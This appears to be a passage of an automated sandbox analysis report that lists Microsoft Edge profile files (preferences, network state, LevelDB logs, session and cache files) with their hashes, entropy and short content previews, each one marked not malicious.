                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ed6aada2-34d5-4a26-bab6-3f9b498bca33.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2
                                                                                                                                                                                                                              Entropy (8bit):1.0
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:H:H
                                                                                                                                                                                                                              MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                              SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                              SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                              SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:[]

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\f3100326-c3a9-46b5-845c-d61e9141a711.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                              Size (bytes):1334
                                                                                                                                                                                                                              Entropy (8bit):5.3068589626259115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:YcCp/WwFGJ/I3w6C1VdsfgZVMdmRds/pJZFRudFGRwC5mWw6maPsQYhbS7nby:YcCpfgCgRsfgts/p/fc7C0khYhbt
                                                                                                                                                                                                                              MD5:49A69CA3DB588A227043FAD82A8EED0F
                                                                                                                                                                                                                              SHA1:EB7B013107043573C381D8E501A44359A235AA6A
                                                                                                                                                                                                                              SHA-256:801C37DA262918F4D4905DD59A3DD0E39F28D1B9415FA98B49C8F74BC9B7098E
                                                                                                                                                                                                                              SHA-512:F30BF2452A9200E4C6D18A5445B48CD217CF45A503CB404DB21E2947DBE7DD747F5593588102CCEC17679B93E8130B728C006C2BA986222425A52D896C5A0542
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010818082117","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379010821830801","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczo

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.7429706785845666
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
                                                                                                                                                                                                                              MD5:E837EA6D04D8BF6E6EB3DE44A0D55B3B
                                                                                                                                                                                                                              SHA1:4B9760FAE3A4790477529EA827DFBAF077B626A6
                                                                                                                                                                                                                              SHA-256:9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
                                                                                                                                                                                                                              SHA-512:1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10346
                                                                                                                                                                                                                              Entropy (8bit):5.1341367806862195
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:stQkmw5sBQcsCRIa34Hko4h8MbV+FItQA4kq7NITbUNKJ:stQKsBQcnRXfbGcQxX7NIb
                                                                                                                                                                                                                              MD5:27EADB3399C6406701850B36879AF39A
                                                                                                                                                                                                                              SHA1:EC044A4215EBABB53C08BC01AF0064E9EE4EDC75
                                                                                                                                                                                                                              SHA-256:8FECB9634AFE1AF8BFC10930192790C24138C0521D8094F8CBB9CE68CCE4EDC1
                                                                                                                                                                                                                              SHA-512:81890FD516DB6DF649004B9F06C382F81BB700F966DE4213FA2C12E47328B67A06053BB473FECE828C7D348FD845A7F456A16D7B769F08BBD3C85880A8190857
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13376418816206161","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340968290017037","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"time_of_last_normal_window_close":"13376418824310325","toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":-1436,"left":-2400,"maximized":false,"right":-1350,"top":-2400,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":885,"browser_content_container_width":1006,"browser_content_container_x":0,"browser_content_container_y":79,"continuous_migration":{"ci_correction_for_holdout_tre

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):25029
                                                                                                                                                                                                                              Entropy (8bit):5.566551004421152
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:JGrdUSWPs2fYEi58F1+UoAYDCx9Tuqh0VfUC9xbog/OVU1SJUrwqUWpHtuw:JGrdUSWPs2f1Eu1jaRwJNqUit/
                                                                                                                                                                                                                              MD5:CCB25D9BF3CDF2D108B7FB4A69B25217
                                                                                                                                                                                                                              SHA1:9209729D6D8026A857E130BF8715D2587C95C062
                                                                                                                                                                                                                              SHA-256:7472CB3211F2CDF16624306E74A6C19CCE6697F961893A47E26B75E356C7EEBB
                                                                                                                                                                                                                              SHA-512:DA12E6ECD13B9A47FD3607AFB748760EA0861D72FA9D4658D51F683B128120CA3A59DFBA0D8DB888E73850B7090711FD2819583A36D2E01711A001CE74CD5707
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13376418815238455","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13376418815238455","location":5,"ma

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):337
                                                                                                                                                                                                                              Entropy (8bit):4.035905168618675
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:S85aEFljljljljlj1illaV93lgxFdUA5EEEE:S+a8ljljljljlYlcl+FH
                                                                                                                                                                                                                              MD5:FC5025428F23595526C5BAE35705752D
                                                                                                                                                                                                                              SHA1:1987ACFE5714E0C981729995E7A808C207D5BDC8
                                                                                                                                                                                                                              SHA-256:86813B5065F5B862071B10BEA5065D31102728AB6F356D1A7F88058BEA7FEACF
                                                                                                                                                                                                                              SHA-512:1926354B6DCDDE2309A4E766D7A0948094D3A3D33B2C32AB6633D810BF0DC786BF71BEA9C1577D1DC774B7557E38B1E92EA8480270E212C088FFAED5204D5397
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...............?},.b................next-map-id.1.Cnamespace-85a6a667_205f_4293_829e_9b616a85deca-https://ntp.msn.com/.0V.e................V.e................V.e................V.e................V.e................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.248243401541827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUGq2PCHhJ23oH+TcwtrQMxIFUt8YUuRXZmw+YULFkwOCHhJ23oH+TcwtrQMFLJ:LvBYebCFUt8c/+D56YebtJ
                                                                                                                                                                                                                              MD5:D41B01155477023C983C0E666E05F7C8
                                                                                                                                                                                                                              SHA1:4870909D08E6A142C98666C134B154AAE0A68E61
                                                                                                                                                                                                                              SHA-256:1D28A071FF4ECD0CB429E6F09606923D7863640BCD7CE76BCD5D2C63347C0F93
                                                                                                                                                                                                                              SHA-512:D40A531D89A251CDD4844AA334DED5D7DEDC0ABC9CF2C40047223F5C445112D3E417BF840CD3520770587F9234D4BD1F337DFDF52700D81E48218D3268EF4142
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.367 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/18-10:53:36.377 1994 Recovering log #3.2024/11/18-10:53:36.385 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):324
                                                                                                                                                                                                                              Entropy (8bit):5.248243401541827
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUGq2PCHhJ23oH+TcwtrQMxIFUt8YUuRXZmw+YULFkwOCHhJ23oH+TcwtrQMFLJ:LvBYebCFUt8c/+D56YebtJ
                                                                                                                                                                                                                              MD5:D41B01155477023C983C0E666E05F7C8
                                                                                                                                                                                                                              SHA1:4870909D08E6A142C98666C134B154AAE0A68E61
                                                                                                                                                                                                                              SHA-256:1D28A071FF4ECD0CB429E6F09606923D7863640BCD7CE76BCD5D2C63347C0F93
                                                                                                                                                                                                                              SHA-512:D40A531D89A251CDD4844AA334DED5D7DEDC0ABC9CF2C40047223F5C445112D3E417BF840CD3520770587F9234D4BD1F337DFDF52700D81E48218D3268EF4142
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.367 1994 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/11/18-10:53:36.377 1994 Recovering log #3.2024/11/18-10:53:36.385 1994 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13376418817736069

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1323
                                                                                                                                                                                                                              Entropy (8bit):3.707843473443351
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:3JnlGxLHpsAF4unxatLp3X2amEtG1ChqYeUJWnQKkOAM4btT37:3J4xbzFMLp2FEkChzeUJWQHOp277
                                                                                                                                                                                                                              MD5:A49CDB730B5881C3C7C6F7CD27C5113C
                                                                                                                                                                                                                              SHA1:E47DC498D7EF6D6DAC5B33C9A89BBB28B43B3870
                                                                                                                                                                                                                              SHA-256:1C5A22C0A3536C8F9D737AF52E26274E6329AAA85EF911A0134ADD5F819EF9DE
                                                                                                                                                                                                                              SHA-512:6500FE884D5FA5D7A59FDF9D493BD75F17278BAE49E74F43CFAE5526686FE82CEA60601B172AE011C6B85C86CBA312217BAA57D3FBCF59CE7B745D1F68BA5A9A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SNSS.......!..2...........!..2......"!..2...........!..2.......!..2......."..2......."..2....!.."..2...............................!..2"..21..,..."..2$...85a6a667_205f_4293_829e_9b616a85deca...!..2......."..2....GfW........!..2......"..2..........."..2........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.........1'......1'.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8....................................................................... .......................................................P...$...2.5.5.8.7.3.1.0.-.0.7.e.c.-.4.c.c.e.-.a.6.2.1.-.2.3.7.4.5.3.c.6.0.8.3.1.

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                              Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                              MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                              SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                              SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                              SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                              Entropy (8bit):5.144618866723372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUdkQ+q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YUdkgZmw+YUdkQVkwOCHhJ23oH+Tcz:rvBYebIhHh2FUt8J/+D56YebIhHLJ
                                                                                                                                                                                                                              MD5:0F68FBDCFF4DFEDC5A21EFC7FF9895CC
                                                                                                                                                                                                                              SHA1:05C56F867E66BB6E8E67621EDF244A4F7B5E09C5
                                                                                                                                                                                                                              SHA-256:DC76C426C057B68FDAC00890B7D567706A68386A810C54CEB25C3ABC6A69B154
                                                                                                                                                                                                                              SHA-512:CC870E9EE649E05BDF733552A9D9D54B0393AFB4790948C5FB480E3A9247B9BACDB3C87EF49F28E17584093797F1D1B048FC38C4EC73503383277D59CE4AB8A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.218 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/18-10:53:35.218 1df8 Recovering log #3.2024/11/18-10:53:35.218 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):352
                                                                                                                                                                                                                              Entropy (8bit):5.144618866723372
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUdkQ+q2PCHhJ23oH+Tcwt7Uh2ghZIFUt8YUdkgZmw+YUdkQVkwOCHhJ23oH+Tcz:rvBYebIhHh2FUt8J/+D56YebIhHLJ
                                                                                                                                                                                                                              MD5:0F68FBDCFF4DFEDC5A21EFC7FF9895CC
                                                                                                                                                                                                                              SHA1:05C56F867E66BB6E8E67621EDF244A4F7B5E09C5
                                                                                                                                                                                                                              SHA-256:DC76C426C057B68FDAC00890B7D567706A68386A810C54CEB25C3ABC6A69B154
                                                                                                                                                                                                                              SHA-512:CC870E9EE649E05BDF733552A9D9D54B0393AFB4790948C5FB480E3A9247B9BACDB3C87EF49F28E17584093797F1D1B048FC38C4EC73503383277D59CE4AB8A9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:35.218 1df8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/11/18-10:53:35.218 1df8 Recovering log #3.2024/11/18-10:53:35.218 1df8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):270336
                                                                                                                                                                                                                              Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                              MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                              SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                              SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                              SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):434
                                                                                                                                                                                                                              Entropy (8bit):5.26002961906001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUmyq2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUt8YUP1Zmw+YU6RkwOCHhJ23oH+Ts:6vBYebvqBQFUt811/+U56YebvqBvJ
                                                                                                                                                                                                                              MD5:FD61B38804B4FAE382C393F161719FD4
                                                                                                                                                                                                                              SHA1:5D0284ED1F1657AA5400E9D372270DAF66DC2C4E
                                                                                                                                                                                                                              SHA-256:0BAD43AB90D780FF31A83002FC12F290A991A4A2C813DFCD3AEF62ABB4ED3D5D
                                                                                                                                                                                                                              SHA-512:5D356F652A4290C81E329D630D8696F43E3BAB346D6118F89D6482535FCCBF25F983136858EC1E7AA6E512775C4D2619921C571DFBAEE6A3E410A2A81B73FEEF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.394 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:36.395 14c0 Recovering log #3.2024/11/18-10:53:36.398 14c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):434
                                                                                                                                                                                                                              Entropy (8bit):5.26002961906001
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:HUmyq2PCHhJ23oH+TcwtzjqEKj3K/2jMGIFUt8YUP1Zmw+YU6RkwOCHhJ23oH+Ts:6vBYebvqBQFUt811/+U56YebvqBvJ
                                                                                                                                                                                                                              MD5:FD61B38804B4FAE382C393F161719FD4
                                                                                                                                                                                                                              SHA1:5D0284ED1F1657AA5400E9D372270DAF66DC2C4E
                                                                                                                                                                                                                              SHA-256:0BAD43AB90D780FF31A83002FC12F290A991A4A2C813DFCD3AEF62ABB4ED3D5D
                                                                                                                                                                                                                              SHA-512:5D356F652A4290C81E329D630D8696F43E3BAB346D6118F89D6482535FCCBF25F983136858EC1E7AA6E512775C4D2619921C571DFBAEE6A3E410A2A81B73FEEF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:2024/11/18-10:53:36.394 14c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/11/18-10:53:36.395 14c0 Recovering log #3.2024/11/18-10:53:36.398 14c0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2b1c10cc-6285-4436-8e1b-9e29df06a83c.tmp

                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):40
                                                                                                                                                                                                                              Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                              MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                              SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                              SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                              SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2c7af574-ea0e-4d25-87c1-428efa103a9c.tmp

                                                                                                                                                                                                                              Download File
